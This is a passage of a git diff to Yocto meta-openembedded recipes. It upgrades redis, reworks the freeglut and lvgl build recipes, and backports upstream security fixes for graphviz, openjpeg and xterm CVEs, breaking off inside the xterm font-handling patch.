ExecStart=/usr/bin/redis-server /etc/redis/redis.conf ExecStop=/usr/bin/redis-cli shutdown Restart=always LimitNOFILE=10032 +Type=notify [Install] WantedBy=multi-user.target diff --git a/meta-oe/recipes-extended/redis/redis/0006-Define-correct-gregs-for-RISCV32.patch b/meta-oe/recipes-extended/redis/redis/0006-Define-correct-gregs-for-RISCV32.patch index b2d1a32eda..9d7e502717 100644 --- a/meta-oe/recipes-extended/redis/redis/0006-Define-correct-gregs-for-RISCV32.patch +++ b/meta-oe/recipes-extended/redis/redis/0006-Define-correct-gregs-for-RISCV32.patch @@ -1,4 +1,4 @@ -From 6134b471c35df826ccb41aab9a47e5c89e15a0c4 Mon Sep 17 00:00:00 2001 +From 26bd72f3b8de22e5036d86e6c79f815853b83473 Mon Sep 17 00:00:00 2001 From: Khem Raj <raj.khem@gmail.com> Date: Mon, 26 Oct 2020 21:32:22 -0700 Subject: [PATCH] Define correct gregs for RISCV32 @@ -13,10 +13,10 @@ Signed-off-by: Yi Fan Yu <yifan.yu@windriver.com> 1 file changed, 24 insertions(+), 2 deletions(-) diff --git a/src/debug.c b/src/debug.c -index e7fec29..5abb404 100644 +index 5318c14..8c21b47 100644 --- a/src/debug.c +++ b/src/debug.c -@@ -1039,7 +1039,9 @@ static void *getMcontextEip(ucontext_t *uc) { +@@ -1055,7 +1055,9 @@ static void* getAndSetMcontextEip(ucontext_t *uc, void *eip) { #endif #elif defined(__linux__) /* Linux */ @@ -24,10 +24,10 @@ index e7fec29..5abb404 100644 + #if defined(__riscv) && __riscv_xlen == 32 + return (void*) uc->uc_mcontext.__gregs[REG_PC]; + #elif defined(__i386__) || ((defined(__X86_64__) || defined(__x86_64__)) && defined(__ILP32__)) - return (void*) uc->uc_mcontext.gregs[14]; /* Linux 32 */ + GET_SET_RETURN(uc->uc_mcontext.gregs[14], eip); #elif defined(__X86_64__) || defined(__x86_64__) - return (void*) uc->uc_mcontext.gregs[16]; /* Linux 64 */ -@@ -1206,8 +1208,28 @@ void logRegisters(ucontext_t *uc) { + GET_SET_RETURN(uc->uc_mcontext.gregs[16], eip); +@@ -1222,8 +1224,28 @@ void logRegisters(ucontext_t *uc) { #endif /* Linux */ #elif defined(__linux__) @@ -57,3 +57,6 @@ index e7fec29..5abb404 100644 serverLog(LL_WARNING, "\n" "EAX:%08lx EBX:%08lx ECX:%08lx EDX:%08lx\n" +-- +2.25.1 + diff --git a/meta-oe/recipes-extended/redis/redis_6.2.7.bb b/meta-oe/recipes-extended/redis/redis_6.2.12.bb index 7f922a4e0f..3ed6867816 100644 --- a/meta-oe/recipes-extended/redis/redis_6.2.7.bb +++ b/meta-oe/recipes-extended/redis/redis_6.2.12.bb @@ -17,7 +17,7 @@ SRC_URI = "http://download.redis.io/releases/${BP}.tar.gz \ file://GNU_SOURCE.patch \ file://0006-Define-correct-gregs-for-RISCV32.patch \ " -SRC_URI[sha256sum] = "b7a79cc3b46d3c6eb52fa37dde34a4a60824079ebdfb3abfbbfa035947c55319" +SRC_URI[sha256sum] = "75352eef41e97e84bfa94292cbac79e5add5345fc79787df5cbdff703353fb1b" inherit autotools-brokensep update-rc.d systemd useradd diff --git a/meta-oe/recipes-extended/redis/redis_7.0.4.bb b/meta-oe/recipes-extended/redis/redis_7.0.13.bb index 993ff34b10..e88ab4ddf5 100644 --- a/meta-oe/recipes-extended/redis/redis_7.0.4.bb +++ b/meta-oe/recipes-extended/redis/redis_7.0.13.bb @@ -6,8 +6,6 @@ LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://COPYING;md5=8ffdd6c926faaece928cf9d9640132d2" DEPENDS = "readline lua ncurses" -FILESPATH =. "${FILE_DIRNAME}/${PN}-7:" - SRC_URI = "http://download.redis.io/releases/${BP}.tar.gz \ file://redis.conf \ file://init-redis-server \ @@ -16,10 +14,10 @@ SRC_URI = "http://download.redis.io/releases/${BP}.tar.gz \ file://lua-update-Makefile-to-use-environment-build-setting.patch \ file://oe-use-libc-malloc.patch \ file://0001-src-Do-not-reset-FINAL_LIBS.patch \ - file://GNU_SOURCE.patch \ + file://GNU_SOURCE-7.patch \ file://0006-Define-correct-gregs-for-RISCV32.patch \ " -SRC_URI[sha256sum] = "f0e65fda74c44a3dd4fa9d512d4d4d833dd0939c934e946a5c622a630d057f2f" +SRC_URI[sha256sum] = "97065774d5fb8388eb0d8913458decfcb167d356e40d31dd01cd30c1cc391673" inherit autotools-brokensep update-rc.d systemd useradd @@ -35,7 +33,10 @@ USERADD_PACKAGES = "${PN}" USERADD_PARAM:${PN} = "--system --home-dir /var/lib/redis -g redis --shell /bin/false redis" GROUPADD_PARAM:${PN} = "--system redis" -REDIS_ON_SYSTEMD = "${@bb.utils.contains('DISTRO_FEATURES', 'systemd', 'true', 'false', d)}" +PACKAGECONFIG = "${@bb.utils.filter('DISTRO_FEATURES', 'systemd', d)}" +PACKAGECONFIG[systemd] = "USE_SYSTEMD=yes,USE_SYSTEMD=no,systemd" + +EXTRA_OEMAKE += "${PACKAGECONFIG_CONFARGS}" do_compile:prepend() { (cd deps && oe_runmake hiredis lua linenoise) @@ -55,8 +56,9 @@ do_install() { install -m 0644 ${WORKDIR}/redis.service ${D}${systemd_system_unitdir} sed -i 's!/usr/sbin/!${sbindir}/!g' ${D}${systemd_system_unitdir}/redis.service - if [ "${REDIS_ON_SYSTEMD}" = true ]; then + if ${@bb.utils.contains('DISTRO_FEATURES', 'systemd', 'true', 'false', d)}; then sed -i 's!daemonize yes!# daemonize yes!' ${D}/${sysconfdir}/redis/redis.conf + sed -i 's!supervised no!supervised systemd!' ${D}/${sysconfdir}/redis/redis.conf fi } diff --git a/meta-oe/recipes-graphics/freeglut/freeglut_3.2.1.bb b/meta-oe/recipes-graphics/freeglut/freeglut_3.2.1.bb index 6ef9f74c70..2f4f16589d 100644 --- a/meta-oe/recipes-graphics/freeglut/freeglut_3.2.1.bb +++ b/meta-oe/recipes-graphics/freeglut/freeglut_3.2.1.bb @@ -7,14 +7,24 @@ SRC_URI = "https://sourceforge.net/projects/${BPN}/files/${BPN}/${PV}/${BPN}-${P SRC_URI[md5sum] = "cd5c670c1086358598a6d4a9d166949d" SRC_URI[sha256sum] = "d4000e02102acaf259998c870e25214739d1f16f67f99cb35e4f46841399da68" -inherit cmake features_check +inherit cmake features_check pkgconfig -# depends on virtual/libx11, virtual/libgl -REQUIRED_DISTRO_FEATURES = "x11 opengl" +# depends on virtual/libgl +REQUIRED_DISTRO_FEATURES = "opengl" +PACKAGECONFIG ?= "${@bb.utils.filter('DISTRO_FEATURES', 'wayland x11', d)}" +PACKAGECONFIG[gles] = "-DFREEGLUT_GLES=ON,-DFREEGLUT_GLES=OFF," +PACKAGECONFIG[wayland] = "-DFREEGLUT_WAYLAND=ON,-DFREEGLUT_WAYLAND=OFF,libxkbcommon" +PACKAGECONFIG[demos] = "-DFREEGLUT_BUILD_DEMOS=ON,-DFREEGLUT_BUILD_DEMOS=OFF," +PACKAGECONFIG[x11] = ",,virtual/libx11 libice libxmu libglu libxrandr libxext" # Do not use -fno-common, check back when upgrading to new version it might not be needed CFLAGS += "-fcommon" PROVIDES += "mesa-glut" -DEPENDS = "virtual/libx11 libxmu libxi virtual/libgl libglu libxrandr" +DEPENDS = "virtual/libgl libxi" + +do_install:append() { + # Remove buildpaths + sed -i "s#${RECIPE_SYSROOT}##g" ${D}${libdir}/cmake/FreeGLUT/FreeGLUTTargets.cmake +} diff --git a/meta-oe/recipes-graphics/graphviz/graphviz/CVE-2023-46045-1.patch b/meta-oe/recipes-graphics/graphviz/graphviz/CVE-2023-46045-1.patch new file mode 100644 index 0000000000..a48f8aa06a --- /dev/null +++ b/meta-oe/recipes-graphics/graphviz/graphviz/CVE-2023-46045-1.patch @@ -0,0 +1,38 @@ +From 361f274ca901c3c476697a6404662d95f4dd43cb Mon Sep 17 00:00:00 2001 +From: Matthew Fernandez <matthew.fernandez@gmail.com> +Date: Fri, 12 Jan 2024 17:06:17 +1100 +Subject: [PATCH] gvc gvconfig_plugin_install_from_config: more tightly scope + 'gv_api' + +Upstream-Status: Backport [https://gitlab.com/graphviz/graphviz/-/commit/361f274ca901c3c476697a6404662d95f4dd43cb] +CVE: CVE-2023-46045 + +Signed-off-by: Meenali Gupta <meenali.gupta@windriver.com> +--- + lib/gvc/gvconfig.c | 3 +-- + 1 file changed, 1 insertion(+), 2 deletions(-) + +diff --git a/lib/gvc/gvconfig.c b/lib/gvc/gvconfig.c +index 2d86321..f9d1dcc 100644 +--- a/lib/gvc/gvconfig.c ++++ b/lib/gvc/gvconfig.c +@@ -173,7 +173,6 @@ static int gvconfig_plugin_install_from_config(GVC_t * gvc, char *s) + { + char *package_path, *name, *api; + const char *type; +- api_t gv_api; + int quality, rc; + int nest = 0; + gvplugin_package_t *package; +@@ -188,7 +187,7 @@ static int gvconfig_plugin_install_from_config(GVC_t * gvc, char *s) + package = gvplugin_package_record(gvc, package_path, name); + do { + api = token(&nest, &s); +- gv_api = gvplugin_api(api); ++ const api_t gv_api = gvplugin_api(api); + do { + if (nest == 2) { + type = token(&nest, &s); +-- +2.40.0 + diff --git a/meta-oe/recipes-graphics/graphviz/graphviz/CVE-2023-46045-2.patch b/meta-oe/recipes-graphics/graphviz/graphviz/CVE-2023-46045-2.patch new file mode 100644 index 0000000000..4c70b1a877 --- /dev/null +++ b/meta-oe/recipes-graphics/graphviz/graphviz/CVE-2023-46045-2.patch @@ -0,0 +1,39 @@ +From 3f31704cafd7da3e86bb2861accf5e90c973e62a Mon Sep 17 00:00:00 2001 +From: Matthew Fernandez <matthew.fernandez@gmail.com> +Date: Fri, 12 Jan 2024 17:06:17 +1100 +Subject: [PATCH] gvc gvconfig_plugin_install_from_config: more tightly scope + 'api' + +Upstream-Status: Backport [https://gitlab.com/graphviz/graphviz/-/commit/3f31704cafd7da3e86bb2861accf5e90c973e62a] +CVE: CVE-2023-46045 + +Signed-off-by: Meenali Gupta <meenali.gupta@windriver.com> +--- + lib/gvc/gvconfig.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/lib/gvc/gvconfig.c b/lib/gvc/gvconfig.c +index f9d1dcc..95e8c6c 100644 +--- a/lib/gvc/gvconfig.c ++++ b/lib/gvc/gvconfig.c +@@ -171,7 +171,7 @@ static char *token(int *nest, char **tokens) + + static int gvconfig_plugin_install_from_config(GVC_t * gvc, char *s) + { +- char *package_path, *name, *api; ++ char *package_path, *name; + const char *type; + int quality, rc; + int nest = 0; +@@ -186,7 +186,7 @@ static int gvconfig_plugin_install_from_config(GVC_t * gvc, char *s) + name = "x"; + package = gvplugin_package_record(gvc, package_path, name); + do { +- api = token(&nest, &s); ++ const char *api = token(&nest, &s); + const api_t gv_api = gvplugin_api(api); + do { + if (nest == 2) { +-- +2.40.0 + diff --git a/meta-oe/recipes-graphics/graphviz/graphviz/CVE-2023-46045-3.patch b/meta-oe/recipes-graphics/graphviz/graphviz/CVE-2023-46045-3.patch new file mode 100644 index 0000000000..4746265eeb --- /dev/null +++ b/meta-oe/recipes-graphics/graphviz/graphviz/CVE-2023-46045-3.patch @@ -0,0 +1,31 @@ +From a95f977f5d809915ec4b14836d2b5b7f5e74881e Mon Sep 17 00:00:00 2001 +From: Matthew Fernandez <matthew.fernandez@gmail.com> +Date: Fri, 12 Jan 2024 17:06:17 +1100 +Subject: [PATCH] gvc: detect plugin installation failure and display an error + +Upstream-Status: Backport [https://gitlab.com/graphviz/graphviz/-/commit/a95f977f5d809915ec4b14836d2b5b7f5e74881e] +CVE: CVE-2023-46045 + +Signed-off-by: Meenali Gupta <meenali.gupta@windriver.com> +--- + lib/gvc/gvconfig.c | 4 ++++ + 1 file changed, 4 insertions(+) + +diff --git a/lib/gvc/gvconfig.c b/lib/gvc/gvconfig.c +index 95e8c6c..77d0865 100644 +--- a/lib/gvc/gvconfig.c ++++ b/lib/gvc/gvconfig.c +@@ -188,6 +188,10 @@ static int gvconfig_plugin_install_from_config(GVC_t * gvc, char *s) + do { + const char *api = token(&nest, &s); + const api_t gv_api = gvplugin_api(api); ++ if (gv_api == (api_t)-1) { ++ agerr(AGERR, "config error: %s %s not found\n", package_path, api); ++ return 0; ++ } + do { + if (nest == 2) { + type = token(&nest, &s); +-- +2.40.0 + diff --git a/meta-oe/recipes-graphics/graphviz/graphviz_2.50.0.bb b/meta-oe/recipes-graphics/graphviz/graphviz_2.50.0.bb index 4c51af669c..f06e2adb02 100644 --- a/meta-oe/recipes-graphics/graphviz/graphviz_2.50.0.bb +++ b/meta-oe/recipes-graphics/graphviz/graphviz_2.50.0.bb @@ -20,6 +20,9 @@ DEPENDS:append:class-nativesdk = " ${BPN}-native" inherit autotools-brokensep pkgconfig gettext qemu SRC_URI = "https://gitlab.com/api/v4/projects/4207231/packages/generic/${BPN}-releases/${PV}/${BP}.tar.xz \ + file://CVE-2023-46045-1.patch \ + file://CVE-2023-46045-2.patch \ + file://CVE-2023-46045-3.patch \ " # Use native mkdefs SRC_URI:append:class-target = "\ diff --git a/meta-oe/recipes-graphics/lvgl/lv-drivers_7.11.0.bb b/meta-oe/recipes-graphics/lvgl/lv-drivers_7.11.0.bb index 1a94215839..7f93f704e0 100644 --- a/meta-oe/recipes-graphics/lvgl/lv-drivers_7.11.0.bb +++ b/meta-oe/recipes-graphics/lvgl/lv-drivers_7.11.0.bb @@ -9,7 +9,7 @@ LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE;md5=d6fc0df890c5270ef045981b516bb8f2" # TODO: Pin upstream release (current v7.11.0-80-g419a757) -SRC_URI = "git://github.com/lvgl/lv_drivers;destsuffix=${S};protocol=https;nobranch=1" +SRC_URI = "git://github.com/lvgl/lv_drivers;protocol=https;branch=master" SRCREV = "419a757c23aaa67c676fe3a2196d64808fcf2254" DEPENDS = "libxkbcommon lvgl wayland" @@ -19,15 +19,15 @@ REQUIRED_DISTRO_FEATURES = "wayland" inherit cmake inherit features_check -S = "${WORKDIR}/${PN}-${PV}" +S = "${WORKDIR}/git" LVGL_CONFIG_WAYLAND_HOR_RES ?= "480" LVGL_CONFIG_WAYLAND_VER_RES ?= "320" -EXTRA_OECMAKE += "-Dinstall:BOOL=ON -DLIB_INSTALL_DIR=${BASELIB}" +EXTRA_OECMAKE += "-Dinstall:BOOL=ON -DLIB_INSTALL_DIR=${baselib}" TARGET_CFLAGS += "-DLV_CONF_INCLUDE_SIMPLE=1" -TARGET_CFLAGS += "-I${RECIPE_SYSROOT}/${includedir}/lvgl" +TARGET_CFLAGS += "-I${STAGING_INCDIR}/lvgl" # Upstream does not support a default configuration # but propose a default "disabled" template, which is used as reference diff --git a/meta-oe/recipes-graphics/lvgl/lv-lib-png_8.0.2.bb b/meta-oe/recipes-graphics/lvgl/lv-lib-png_8.0.2.bb index 032e85f522..0049bbe237 100644 --- a/meta-oe/recipes-graphics/lvgl/lv-lib-png_8.0.2.bb +++ b/meta-oe/recipes-graphics/lvgl/lv-lib-png_8.0.2.bb @@ -8,21 +8,23 @@ DESCRIPTION = "Allow the use of PNG images in LVGL. This implementation uses lod LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE;md5=d6fc0df890c5270ef045981b516bb8f2" -SRC_URI = "git://github.com/lvgl/lv_lib_png;destsuffix=${S};protocol=https;nobranch=1" +SRC_URI = "git://github.com/lvgl/lv_lib_png;;protocol=https;branch=master" SRCREV = "bf1531afe07c9f861107559e29ab8a2d83e4715a" +S = "${WORKDIR}/git" + # because of lvgl dependency REQUIRED_DISTRO_FEATURES = "wayland" DEPENDS += "lvgl" -EXTRA_OECMAKE += "-DLIB_INSTALL_DIR=${BASELIB}" +EXTRA_OECMAKE += "-DLIB_INSTALL_DIR=${baselib}" inherit cmake inherit features_check TARGET_CFLAGS += "-DLV_CONF_INCLUDE_SIMPLE=1" -TARGET_CFLAGS += "-I${RECIPE_SYSROOT}/${includedir}/lvgl" +TARGET_CFLAGS += "-I${STAGING_INCDIR}/lvgl" FILES:${PN}-dev = "\ ${includedir}/lvgl/lv_lib_png/ \ diff --git a/meta-oe/recipes-graphics/lvgl/lvgl_8.1.0.bb b/meta-oe/recipes-graphics/lvgl/lvgl_8.1.0.bb index 2005afa2fd..0021da01fb 100644 --- a/meta-oe/recipes-graphics/lvgl/lvgl_8.1.0.bb +++ b/meta-oe/recipes-graphics/lvgl/lvgl_8.1.0.bb @@ -8,7 +8,7 @@ SUMMARY = "Light and Versatile Graphics Library" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENCE.txt;md5=bf1198c89ae87f043108cea62460b03a" -SRC_URI = "gitsm://github.com/lvgl/lvgl;destsuffix=${S};protocol=https;nobranch=1" +SRC_URI = "gitsm://github.com/lvgl/lvgl;protocol=https;branch=master" SRCREV = "d38eb1e689fa5a64c25e677275172d9c8a4ab2f0" REQUIRED_DISTRO_FEATURES = "wayland" @@ -16,8 +16,8 @@ REQUIRED_DISTRO_FEATURES = "wayland" inherit cmake inherit features_check -EXTRA_OECMAKE = "-DLIB_INSTALL_DIR=${BASELIB}" -S = "${WORKDIR}/${PN}-${PV}" +EXTRA_OECMAKE = "-DLIB_INSTALL_DIR=${baselib}" +S = "${WORKDIR}/git" LVGL_CONFIG_LV_MEM_CUSTOM ?= "0" diff --git a/meta-oe/recipes-graphics/openjpeg/openjpeg/CVE-2021-3575.patch b/meta-oe/recipes-graphics/openjpeg/openjpeg/CVE-2021-3575.patch new file mode 100644 index 0000000000..0322f55cc7 --- /dev/null +++ b/meta-oe/recipes-graphics/openjpeg/openjpeg/CVE-2021-3575.patch @@ -0,0 +1,45 @@ +From 7bd884f8750892de4f50bf4642fcfbe7011c6bdf Mon Sep 17 00:00:00 2001 +From: Even Rouault <even.rouault@spatialys.com> +Date: Sun, 18 Feb 2024 17:02:25 +0100 +Subject: [PATCH] opj_decompress: fix off-by-one read heap-buffer-overflow in + sycc420_to_rgb() when x0 and y0 are odd (CVE-2021-3575, fixes #1347) + +Upstream-Status: Backport [https://github.com/uclouvain/openjpeg/commit/7bd884f8750892de4f50bf4642fcfbe7011c6bdf] +CVE: CVE-2021-3575 +Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com> +--- + src/bin/common/color.c | 12 ++++++++++-- + 1 file changed, 10 insertions(+), 2 deletions(-) + +diff --git a/src/bin/common/color.c b/src/bin/common/color.c +index 27f15f13..ae5d648d 100644 +--- a/src/bin/common/color.c ++++ b/src/bin/common/color.c +@@ -358,7 +358,15 @@ static void sycc420_to_rgb(opj_image_t *img) + if (i < loopmaxh) { + size_t j; + +- for (j = 0U; j < (maxw & ~(size_t)1U); j += 2U) { ++ if (offx > 0U) { ++ sycc_to_rgb(offset, upb, *y, 0, 0, r, g, b); ++ ++y; ++ ++r; ++ ++g; ++ ++b; ++ } ++ ++ for (j = 0U; j < (loopmaxw & ~(size_t)1U); j += 2U) { + sycc_to_rgb(offset, upb, *y, *cb, *cr, r, g, b); + + ++y; +@@ -375,7 +383,7 @@ static void sycc420_to_rgb(opj_image_t *img) + ++cb; + ++cr; + } +- if (j < maxw) { ++ if (j < loopmaxw) { + sycc_to_rgb(offset, upb, *y, *cb, *cr, r, g, b); + } + } +-- +2.39.3 diff --git a/meta-oe/recipes-graphics/openjpeg/openjpeg_2.4.0.bb b/meta-oe/recipes-graphics/openjpeg/openjpeg_2.4.0.bb index 42d2b4efb0..a619c07aa4 100644 --- a/meta-oe/recipes-graphics/openjpeg/openjpeg_2.4.0.bb +++ b/meta-oe/recipes-graphics/openjpeg/openjpeg_2.4.0.bb @@ -11,6 +11,7 @@ SRC_URI = " \ file://0001-This-patch-fixed-include-dir-to-usr-include-.-Obviou.patch \ file://CVE-2021-29338.patch \ file://CVE-2022-1122.patch \ + file://CVE-2021-3575.patch \ " SRCREV = "37ac30ceff6640bbab502388c5e0fa0bff23f505" S = "${WORKDIR}/git" @@ -26,4 +27,4 @@ EXTRA_OECMAKE += "-DOPENJPEG_INSTALL_LIB_DIR=${@d.getVar('baselib').replace('/', FILES:${PN} += "${libdir}/openjpeg*" -BBCLASSEXTEND = "native nativesdk" +BBCLASSEXTEND = "native" diff --git a/meta-oe/recipes-graphics/tslib/tslib_1.22.bb b/meta-oe/recipes-graphics/tslib/tslib_1.22.bb index c2000b264b..cb2563225f 100644 --- a/meta-oe/recipes-graphics/tslib/tslib_1.22.bb +++ b/meta-oe/recipes-graphics/tslib/tslib_1.22.bb @@ -81,3 +81,5 @@ FILES:tslib-uinput += "${bindir}/ts_uinput" FILES:tslib-tests = "${bindir}/ts_harvest ${bindir}/ts_print ${bindir}/ts_print_raw ${bindir}/ts_print_mt \ ${bindir}/ts_test ${bindir}/ts_test_mt ${bindir}/ts_verify ${bindir}/ts_finddev ${bindir}/ts_conf" + +BBCLASSEXTEND = "native nativesdk" diff --git a/meta-oe/recipes-graphics/xorg-app/xkbutils_1.0.4.bb b/meta-oe/recipes-graphics/xorg-app/xkbutils_1.0.4.bb index 6a05e98e32..d394b33de2 100644 --- a/meta-oe/recipes-graphics/xorg-app/xkbutils_1.0.4.bb +++ b/meta-oe/recipes-graphics/xorg-app/xkbutils_1.0.4.bb @@ -13,7 +13,5 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=64322fab5239f5c8d97cf6e0e14f1c62" DEPENDS += "libxaw libxkbfile" -BBCLASSEXTEND = "native" - SRC_URI[md5sum] = "502b14843f610af977dffc6cbf2102d5" SRC_URI[sha256sum] = "d2a18ab90275e8bca028773c44264d2266dab70853db4321bdbc18da75148130" diff --git a/meta-oe/recipes-graphics/xorg-app/xsetroot_1.1.2.bb b/meta-oe/recipes-graphics/xorg-app/xsetroot_1.1.2.bb index 30a1e089e3..a9a8acf05c 100644 --- a/meta-oe/recipes-graphics/xorg-app/xsetroot_1.1.2.bb +++ b/meta-oe/recipes-graphics/xorg-app/xsetroot_1.1.2.bb @@ -8,7 +8,6 @@ LICENSE = "MIT" LIC_FILES_CHKSUM = "file://COPYING;md5=6ea29dbee22324787c061f039e0529de" DEPENDS += "xbitmaps libxcursor" -BBCLASSEXTEND = "native" SRC_URI[md5sum] = "5fe769c8777a6e873ed1305e4ce2c353" SRC_URI[sha256sum] = "10c442ba23591fb5470cea477a0aa5f679371f4f879c8387a1d9d05637ae417c" diff --git a/meta-oe/recipes-graphics/xorg-app/xterm/CVE-2022-45063.patch b/meta-oe/recipes-graphics/xorg-app/xterm/CVE-2022-45063.patch new file mode 100644 index 0000000000..167c326822 --- /dev/null +++ b/meta-oe/recipes-graphics/xorg-app/xterm/CVE-2022-45063.patch @@ -0,0 +1,782 @@ +From 787636674918873a091e7a4ef5977263ba982322 Mon Sep 17 00:00:00 2001 +From: "Thomas E. Dickey" <dickey@invisible-island.net> +Date: Sun, 23 Oct 2022 22:59:52 +0000 +Subject: [PATCH] snapshot of project "xterm", label xterm-374c + +Upstream-Status: https://github.com/ThomasDickey/xterm-snapshots/commit/787636674918873a091e7a4ef5977263ba982322 +CVE: CVE-2022-45063 + +Signed-off-by: Siddharth Doshi <sdoshi@mvista.com> +--- + button.c | 14 +-- + charproc.c | 9 +- + doublechr.c | 4 +- + fontutils.c | 266 ++++++++++++++++++++++++++----------------------- + fontutils.h | 4 +- + misc.c | 7 +- + screen.c | 2 +- + xterm.h | 2 +- + xterm.log.html | 6 ++ + 9 files changed, 163 insertions(+), 151 deletions(-) + +diff --git a/button.c b/button.c +index f10092a..0bbf76e 100644 +--- a/button.c ++++ b/button.c +@@ -2051,13 +2051,8 @@ void + UnmapSelections(XtermWidget xw) + { + TScreen *screen = TScreenOf(xw); +- Cardinal n; + +- if (screen->mappedSelect) { +- for (n = 0; screen->mappedSelect[n] != 0; ++n) +- free((void *) screen->mappedSelect[n]); +- FreeAndNull(screen->mappedSelect); +- } ++ FreeAndNull(screen->mappedSelect); + } + + /* +@@ -2093,14 +2088,11 @@ MapSelections(XtermWidget xw, String *params, Cardinal num_params) + if ((result = TypeMallocN(String, num_params + 1)) != 0) { + result[num_params] = 0; + for (j = 0; j < num_params; ++j) { +- result[j] = x_strdup((isSELECT(params[j]) ++ result[j] = (String) (isSELECT(params[j]) + ? mapTo +- : params[j])); ++ : params[j]); + if (result[j] == 0) { + UnmapSelections(xw); +- while (j != 0) { +- free((void *) result[--j]); +- } + FreeAndNull(result); + break; + } +diff --git a/charproc.c b/charproc.c +index 2a3c69a..91cbcea 100644 +--- a/charproc.c ++++ b/charproc.c +@@ -13605,7 +13605,6 @@ DoSetSelectedFont(Widget w, + Bell(xw, XkbBI_MinorError, 0); + } else { + Boolean failed = False; +- int oldFont = TScreenOf(xw)->menu_font_number; + char *save = TScreenOf(xw)->SelectFontName(); + char *val; + char *test; +@@ -13650,10 +13649,6 @@ DoSetSelectedFont(Widget w, + failed = True; + } + if (failed) { +- (void) xtermLoadFont(xw, +- xtermFontName(TScreenOf(xw)->MenuFontName(oldFont)), +- True, +- oldFont); + Bell(xw, XkbBI_MinorError, 0); + } + free(used); +@@ -13662,7 +13657,7 @@ DoSetSelectedFont(Widget w, + } + } + +-void ++Bool + FindFontSelection(XtermWidget xw, const char *atom_name, Bool justprobe) + { + TScreen *screen = TScreenOf(xw); +@@ -13702,7 +13697,7 @@ FindFontSelection(XtermWidget xw, const char *atom_name, Bool justprobe) + DoSetSelectedFont, NULL, + XtLastTimestampProcessed(XtDisplay(xw))); + } +- return; ++ return (screen->SelectFontName() != NULL) ? True : False; + } + + Bool +diff --git a/doublechr.c b/doublechr.c +index a802e32..6416849 100644 +--- a/doublechr.c ++++ b/doublechr.c +@@ -295,7 +295,7 @@ xterm_DoubleGC(XTermDraw * params, GC old_gc, int *inxp) + temp.flags = (params->attr_flags & BOLD); + temp.warn = fwResource; + +- if (!xtermOpenFont(params->xw, name, &temp, False)) { ++ if (!xtermOpenFont(params->xw, name, &temp, NULL, False)) { + XTermDraw local = *params; + char *nname; + +@@ -304,7 +304,7 @@ xterm_DoubleGC(XTermDraw * params, GC old_gc, int *inxp) + nname = xtermSpecialFont(&local); + if (nname != 0) { + found = (Boolean) xtermOpenFont(params->xw, nname, &temp, +- False); ++ NULL, False); + free(nname); + } + } else { +diff --git a/fontutils.c b/fontutils.c +index 1646b4b..71f4ec2 100644 +--- a/fontutils.c ++++ b/fontutils.c +@@ -92,9 +92,9 @@ + } + + #define FREE_FNAME(field) \ +- if (fonts == 0 || myfonts.field != fonts->field) { \ +- FREE_STRING(myfonts.field); \ +- myfonts.field = 0; \ ++ if (fonts == 0 || new_fnames.field != fonts->field) { \ ++ FREE_STRING(new_fnames.field); \ ++ new_fnames.field = 0; \ + } + + /* +@@ -573,7 +573,7 @@ open_italic_font(XtermWidget xw, int n, FontNameProperties *fp, XTermFonts * dat + if ((name = italic_font_name(fp, slant[pass])) != 0) { + TRACE(("open_italic_font %s %s\n", + whichFontEnum((VTFontEnum) n), name)); +- if (xtermOpenFont(xw, name, data, False)) { ++ if (xtermOpenFont(xw, name, data, NULL, False)) { + result = (data->fs != 0); + #if OPT_REPORT_FONTS + if (resource.reportFonts) { +@@ -1037,20 +1037,26 @@ xtermLoadQueryFont(XtermWidget xw, const char *name) + } + + /* +- * Open the given font and verify that it is non-empty. Return a null on ++ * Open the given font and verify that it is non-empty. Return false on + * failure. + */ + Bool + xtermOpenFont(XtermWidget xw, + const char *name, + XTermFonts * result, ++ XTermFonts * current, + Bool force) + { + Bool code = False; + + TRACE(("xtermOpenFont %d:%d '%s'\n", + result->warn, xw->misc.fontWarnings, NonNull(name))); ++ + if (!IsEmpty(name)) { ++ Bool existing = (current != NULL ++ && current->fs != NULL ++ && current->fn != NULL); ++ + if ((result->fs = xtermLoadQueryFont(xw, name)) != 0) { + code = True; + if (EmptyFont(result->fs)) { +@@ -1069,9 +1075,13 @@ xtermOpenFont(XtermWidget xw, + } else { + TRACE(("xtermOpenFont: cannot load font '%s'\n", name)); + } +- if (force) { ++ if (existing) { ++ TRACE(("...continue using font '%s'\n", current->fn)); ++ result->fn = x_strdup(current->fn); ++ result->fs = current->fs; ++ } else if (force) { + NoFontWarning(result); +- code = xtermOpenFont(xw, DEFFONT, result, True); ++ code = xtermOpenFont(xw, DEFFONT, result, NULL, True); + } + } + } +@@ -1321,6 +1331,7 @@ static Bool + loadNormFP(XtermWidget xw, + char **nameOutP, + XTermFonts * infoOut, ++ XTermFonts * current, + int fontnum) + { + Bool status = True; +@@ -1330,7 +1341,7 @@ loadNormFP(XtermWidget xw, + if (!xtermOpenFont(xw, + *nameOutP, + infoOut, +- (fontnum == fontMenu_default))) { ++ current, (fontnum == fontMenu_default))) { + /* + * If we are opening the default font, and it happens to be missing, + * force that to the compiled-in default font, e.g., "fixed". If we +@@ -1365,10 +1376,10 @@ loadBoldFP(XtermWidget xw, + if (fp != 0) { + NoFontWarning(infoOut); + *nameOutP = bold_font_name(fp, fp->average_width); +- if (!xtermOpenFont(xw, *nameOutP, infoOut, False)) { ++ if (!xtermOpenFont(xw, *nameOutP, infoOut, NULL, False)) { + free(*nameOutP); + *nameOutP = bold_font_name(fp, -1); +- xtermOpenFont(xw, *nameOutP, infoOut, False); ++ xtermOpenFont(xw, *nameOutP, infoOut, NULL, False); + } + TRACE(("...derived bold '%s'\n", NonNull(*nameOutP))); + } +@@ -1386,7 +1397,7 @@ loadBoldFP(XtermWidget xw, + TRACE(("...did not get a matching bold font\n")); + } + free(normal); +- } else if (!xtermOpenFont(xw, *nameOutP, infoOut, False)) { ++ } else if (!xtermOpenFont(xw, *nameOutP, infoOut, NULL, False)) { + xtermCopyFontInfo(infoOut, infoRef); + TRACE(("...cannot load bold font '%s'\n", NonNull(*nameOutP))); + } else { +@@ -1440,7 +1451,7 @@ loadWideFP(XtermWidget xw, + } + + if (check_fontname(*nameOutP)) { +- if 